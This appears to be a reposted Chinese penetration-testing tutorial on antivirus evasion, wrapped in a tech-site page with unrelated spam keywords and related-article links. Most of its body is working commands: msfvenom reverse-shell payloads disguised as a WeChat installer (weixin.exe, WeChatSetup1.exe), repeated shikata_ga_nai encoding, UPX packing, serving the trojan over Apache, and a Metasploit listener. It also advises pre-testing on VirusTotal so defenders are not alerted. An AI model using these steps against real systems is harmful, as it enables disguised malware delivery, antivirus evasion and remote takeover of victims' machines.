91欧美超碰AV自拍|国产成年人性爱视频免费看|亚洲 日韩 欧美一厂二区入|人人看人人爽人人操aV|丝袜美腿视频一区二区在线看|人人操人人爽人人爱|婷婷五月天超碰|97色色欧美亚州A√|另类A√无码精品一级av|欧美特级日韩特级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

免殺技術(shù)與殺軟技術(shù)的區(qū)別

馬哥Linux運維 ? 來源:FreeBuf ? 作者:FreeBuf ? 2022-07-08 10:49 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

免殺,又叫免殺毒技術(shù),是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。免殺技術(shù)也并不是十惡不赦的,例如,在軟件保護所用的加密產(chǎn)品(比如殼)中,有一些會被殺毒軟件認為是木馬病毒;一些安全領(lǐng)域中的部分安全檢測產(chǎn)品,也會被殺毒軟件誤殺,這時就需要免殺技術(shù)來應(yīng)對這些不穩(wěn)定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件,生成一個裸奔馬,命名為 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe 》 weixin.exe

abf372ee-fdf9-11ec-ba43-dac502259ad0.jpg

2、部署一下kali上的apache服務(wù),令目標機器能夠訪問下載我們生成的木馬

2.1、kali中是自帶有apache的,啟動apache服務(wù)

ac0b1098-fdf9-11ec-ba43-dac502259ad0.jpg

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

ac23dd8a-fdf9-11ec-ba43-dac502259ad0.jpg

2.3、在靶機下訪問192.168.111.132/weinxin.exe,已經(jīng)下載

ac3774c6-fdf9-11ec-ba43-dac502259ad0.jpg

2.4、發(fā)現(xiàn)被AV查殺

ac4d0750-fdf9-11ec-ba43-dac502259ad0.jpg

ac5d624e-fdf9-11ec-ba43-dac502259ad0.jpg

如果在實戰(zhàn)中,直接投遞裸奔馬比較容易引起對方運維人員的警覺,這種方式也比較冒險,所以在投遞之前,要測試制作的木馬是否會引起相關(guān)AV的查殺,比如在在線多引擎病毒識別工具中去測試

2.5、這里po一個在線殺毒查殺的網(wǎng)站,virustotal是一個提供免費的可疑文件分析服務(wù)的網(wǎng)站,它與傳統(tǒng)殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件。使用多種反病毒引擎對您所上傳的文件進行檢測, 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。

ac70f1a6-fdf9-11ec-ba43-dac502259ad0.jpg

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器,功能是使用msf編碼器對我們制作的木馬進行重新編碼,生成一個二進制文件,這個文件運行后,msf編碼器會將原始程序解碼到內(nèi)存中并執(zhí)行。

1、在kali終端輸入 msfvenom -l encoders,這可以列出所有可用的編碼格式

ac8cc3e0-fdf9-11ec-ba43-dac502259ad0.jpg

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板,這個模塊但是一些反病毒廠商關(guān)注的重點,為了更好的實現(xiàn)免殺,我們需要自主選擇一個待捆綁程序。在這里選擇是真正的微信安裝包。(也有對裸奔馬進行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術(shù)多態(tài),每次生成的攻擊載荷文件都不一樣,有時生成的文件會被查殺,有時不會,所以結(jié)合以上思路,生成一個捆綁木馬,并進行shikata_ga_nai編碼)

aca4ddc2-fdf9-11ec-ba43-dac502259ad0.jpg

把微信安裝包放在/root文件夾下

acbae414-fdf9-11ec-ba43-dac502259ad0.jpg

3、使用msfvenom生成一個Windows環(huán)境下的木馬,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時對木馬進行x86/shikata_ga_nai進行多次編碼的方式進行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

acd4c0dc-fdf9-11ec-ba43-dac502259ad0.jpg

參數(shù)說明:

-e /指定編碼方式對攻擊載荷進行重新編碼

-x /指定木馬捆綁在哪個可執(zhí)行程序模板上

-i /指定對目標進行編碼的次數(shù),多次編碼理論上有助于免殺的實現(xiàn)

-f /指定msf編碼器輸出程序的格式

-0 /指定處理完畢后的文件輸出路徑

4、把生成的文件放在kali中的apache服務(wù)對應(yīng)的文件夾下,令攻擊機訪問

aceb1e7c-fdf9-11ec-ba43-dac502259ad0.jpg

5、攻擊機下載后,在msf上創(chuàng)建監(jiān)聽

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp

show options ///查看一下哪些選項需要配置

set lhost 192.168.111.132 ///設(shè)置一下主機地址

set lport 9999 ///設(shè)置下主機端口,為木馬設(shè)定的端口

run

ad0360e0-fdf9-11ec-ba43-dac502259ad0.jpg

6、在目標機器上點擊偽造的安裝包,沒有打開,因為捆綁木馬并多次編碼后,安裝包源文件已經(jīng)損壞,但是在攻擊機的,目標機器已經(jīng)上線

ad16150a-fdf9-11ec-ba43-dac502259ad0.jpg

3、UPX加殼

upx打包器有兩種功能,一種叫做給程序加殼,一種叫壓縮程序,在這里使用打包器的目的是改變后門程序的特征碼。

壓縮的時候:它首先可執(zhí)行文件中的可執(zhí)行數(shù)據(jù)解壓出來,然后將解壓縮用的代碼附加在前面

運行的時候:將原本的可執(zhí)行數(shù)據(jù)解壓出來,然后再運行解壓縮后的數(shù)據(jù)

1、在kali中內(nèi)置了upx打包器,輸入upx可以看下參數(shù)介紹

ad3097ea-fdf9-11ec-ba43-dac502259ad0.jpg

2、簡單的命令就是直接upx file,對file文件進行加殼處理,加殼后,因為經(jīng)過壓縮,文件大小會變小

ad5161e6-fdf9-11ec-ba43-dac502259ad0.jpg

3、還是老樣子,把上面經(jīng)歷過編碼后,又加殼的weixin安裝包放在apache服務(wù)的文件夾下,供目標機器讀取下載(如上2.4)

ad6f17cc-fdf9-11ec-ba43-dac502259ad0.jpg

4、在msf上可以創(chuàng)建正常的連接和監(jiān)聽,成功傳回

ad9fade2-fdf9-11ec-ba43-dac502259ad0.jpg

后言

免殺技術(shù)也被安全技術(shù)廠商盯上并開發(fā)相對應(yīng)的檢測技術(shù),所以免殺技術(shù)與殺軟技術(shù)是互相促進發(fā)展的,而且發(fā)展速度很快,有些現(xiàn)在可以測試成功的殺軟技術(shù),過段時間就不能用了。免殺技術(shù)還需要狠下功夫去研究,接下來也會嘗試python,GO寫的免殺,也會在后續(xù)文章中敘述進展!

原文標題:滲透測試-木馬免殺的幾種方式

文章出處:【微信公眾號:馬哥Linux運維】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 軟件
    +關(guān)注

    關(guān)注

    69

    文章

    5331

    瀏覽量

    91561
  • 木馬
    +關(guān)注

    關(guān)注

    0

    文章

    47

    瀏覽量

    13708
  • python
    +關(guān)注

    關(guān)注

    57

    文章

    4876

    瀏覽量

    90013
收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關(guān)推薦
    熱點推薦

    AI眼鏡瘋了!Meta、小米都在搶,恒玄砸1.5億,腦機技術(shù)也來了

    ? 電子發(fā)燒友網(wǎng)報道(文/莫婷婷)隨著AI智能眼鏡產(chǎn)業(yè)邁入高速發(fā)展通道,產(chǎn)品形態(tài)創(chuàng)新與技術(shù)體系完善正以超預(yù)期速度同步推進,語音支付、腦機接口等技術(shù)落地AI智能眼鏡,智能眼鏡正在從“極客玩具”蛻變
    的頭像 發(fā)表于 07-23 07:21 ?1.3w次閱讀
    AI眼鏡<b class='flag-5'>殺</b>瘋了!Meta、小米都在搶,恒玄砸1.5億,腦機<b class='flag-5'>技術(shù)</b>也來了

    通動力中標豫智工業(yè)大模型技術(shù)研發(fā)與示范應(yīng)用項目

    通動力重磅中標河南省豫智數(shù)能科技有限公司“豫智工業(yè)大模型技術(shù)研發(fā)與示范應(yīng)用項目”。此次合作既印證了通動力在工業(yè)大模型領(lǐng)域的技術(shù)實力,也標志著
    的頭像 發(fā)表于 12-11 12:37 ?653次閱讀

    解析LGA與BGA芯片封裝技術(shù)區(qū)別

    在當今電子設(shè)備追求輕薄短小的趨勢下,芯片封裝技術(shù)的重要性日益凸顯。作為兩種主流的封裝方式,LGA和BGA各有特點,而新興的激光錫球焊接技術(shù)正在為封裝工藝帶來革命性的變化。本文將深入解析LGA與BGA的區(qū)別,并探討激光錫球焊接
    的頭像 發(fā)表于 11-19 09:22 ?1821次閱讀
    解析LGA與BGA芯片封裝<b class='flag-5'>技術(shù)</b>的<b class='flag-5'>區(qū)別</b>

    AI影像新高度!性能提升40%,高通與虹攜手發(fā)布超域融合視頻技術(shù)

    公司聯(lián)合高通展示了視頻超域融合技術(shù)。據(jù)悉,在驍龍技術(shù)峰會上,虹高級副總裁兼首席營銷官徐堅首次公開展示了虹基于全球驍龍8平臺打造的超域
    的頭像 發(fā)表于 10-15 07:17 ?1.2w次閱讀
    AI影像新高度!性能提升40%,高通與虹<b class='flag-5'>軟</b>攜手發(fā)布超域融合視頻<b class='flag-5'>技術(shù)</b>

    通動力入選2025新一代信息技術(shù)應(yīng)用優(yōu)秀案例

    近日,DBC德本咨詢正式發(fā)布“2025新一代信息技術(shù)應(yīng)用優(yōu)秀案例”榜單,通動力信息技術(shù)(集團)股份有限公司攜手廣西星網(wǎng)智云科技有限公司,為廣西玉柴機器集團有限公司打造的“玉柴數(shù)智化審計業(yè)務(wù)場景項目”成功入選,位列榜單第二名,充
    的頭像 發(fā)表于 09-28 17:48 ?1385次閱讀

    國際榮獲信創(chuàng)數(shù)智技術(shù)服務(wù)能力一級評估單位

    近日,中國際有限公司(以下簡稱“中國際”)榮獲中國通信學(xué)會信創(chuàng)技術(shù)專業(yè)委員會頒發(fā)的“信創(chuàng)數(shù)智技術(shù)服務(wù)能力一級評估單位”資質(zhì)。此次通過評估,標志著中
    的頭像 發(fā)表于 09-15 09:29 ?951次閱讀

    通動力中標卓望公司技術(shù)服務(wù)框架采購項目

    近日,通動力成功中標卓望信息技術(shù)(北京)有限公司(以下簡稱“卓望公司”)2025—2027年技術(shù)服務(wù)框架采購項目,中標份額排名第一。本次中標不僅彰顯了通動力在
    的頭像 發(fā)表于 09-06 10:28 ?1242次閱讀

    一種基于紅外吸收光譜技術(shù)校準氣體傳感芯片

    近日,天津大學(xué)精密儀器與光電子工程學(xué)院的光子芯片實驗室研發(fā)了一種基于紅外吸收光譜技術(shù)校準氣體傳感芯片,成果獲得中國發(fā)明專利(ZL202411675536.3)授權(quán)。
    的頭像 發(fā)表于 07-29 10:32 ?912次閱讀
    一種基于紅外吸收光譜<b class='flag-5'>技術(shù)</b>的<b class='flag-5'>免</b>校準氣體傳感芯片

    磁集成技術(shù)磁材料有何要求?

    元件集成到單一磁芯或復(fù)合結(jié)構(gòu)中,顯著降低系統(tǒng)損耗并提升功率密度,已廣泛應(yīng)用于新能源汽車、5G通信電源、數(shù)據(jù)中心及消費電子等領(lǐng)域。 然而,磁集成技術(shù)依然擺脫不了對磁材料性能升級的要求。傳統(tǒng)磁材料(如鐵氧體、硅鋼)在高頻、高溫、
    的頭像 發(fā)表于 07-24 11:57 ?791次閱讀
    磁集成<b class='flag-5'>技術(shù)</b>對<b class='flag-5'>軟</b>磁材料有何要求?

    顛覆智造:profinet轉(zhuǎn)ethernet ip網(wǎng)關(guān)×發(fā)那科×西門子的三國

    顛覆智造: profinet轉(zhuǎn)ethernet ip網(wǎng)關(guān)x 發(fā)那科×西門子的“三國”如何引爆汽車產(chǎn)線效能革命? 行業(yè)案例:汽車零部件柔性搬運系統(tǒng)集成應(yīng)用 某汽車零部件工廠需升級生產(chǎn)線,實現(xiàn)不同型
    的頭像 發(fā)表于 06-16 19:57 ?727次閱讀
    顛覆智造:profinet轉(zhuǎn)ethernet ip網(wǎng)關(guān)×發(fā)那科×西門子的三國<b class='flag-5'>殺</b>

    LC濾波器與電感、電容的區(qū)別技術(shù)分析與應(yīng)用

    ?LC濾波器與電感、電容的區(qū)別技術(shù)分析與應(yīng)用摘要LC濾波器是由電感(L)和電容(C)組成的被動電路,用于濾除特定頻率的信號,廣泛應(yīng)用于電磁兼容(EMC)、信號處理和電源管理等領(lǐng)域。本文檔詳細分析
    的頭像 發(fā)表于 05-12 20:19 ?1626次閱讀
    LC濾波器與電感、電容的<b class='flag-5'>區(qū)別</b>:<b class='flag-5'>技術(shù)</b>分析與應(yīng)用

    藍牙5.4與藍牙6.0的核心區(qū)別技術(shù)特性對比

    藍牙5.4與藍牙6.0的核心區(qū)別技術(shù)特性對比
    的頭像 發(fā)表于 04-02 15:55 ?7.2w次閱讀
    藍牙5.4與藍牙6.0的核心<b class='flag-5'>區(qū)別</b>及<b class='flag-5'>技術(shù)</b>特性對比

    MPLS和SR傳輸技術(shù)區(qū)別

    當你在游戲里“五”時卡頓,當你在視頻會議中突然掉線,這些抓狂瞬間的背后,大多是數(shù)據(jù)傳輸丟包或者延遲造成的。而如何保證不丟包、低延遲,MPLS(Multiprotocol Label
    的頭像 發(fā)表于 03-28 10:15 ?1161次閱讀
    MPLS和SR傳輸<b class='flag-5'>技術(shù)</b>的<b class='flag-5'>區(qū)別</b>

    通工業(yè)互聯(lián)與重慶工程職業(yè)技術(shù)學(xué)院達成合作

    近日,通工業(yè)互聯(lián)攜手重慶工程職業(yè)技術(shù)學(xué)院,共同開展工業(yè)互聯(lián)網(wǎng)實訓(xùn)設(shè)備升級,這一創(chuàng)新性教育賦能合作不僅再次證明了通動力在工業(yè)互聯(lián)網(wǎng)領(lǐng)域的領(lǐng)先實力,也展現(xiàn)了公司致力于通過前沿技術(shù)賦能職
    的頭像 發(fā)表于 03-27 11:13 ?987次閱讀

    雙核鎖步技術(shù)在汽車芯片錯誤防護中的應(yīng)用詳解

    摘要 本文深入探討了雙核鎖步技術(shù)在保障汽車芯片安全性中的應(yīng)用。文章首先分析了國產(chǎn)車規(guī)芯片在高安全可靠領(lǐng)域面臨的錯誤難點及攻克方向,然后詳細介紹了雙核鎖步技術(shù)的基本原理及其在汽車芯片防
    的頭像 發(fā)表于 03-21 22:58 ?1132次閱讀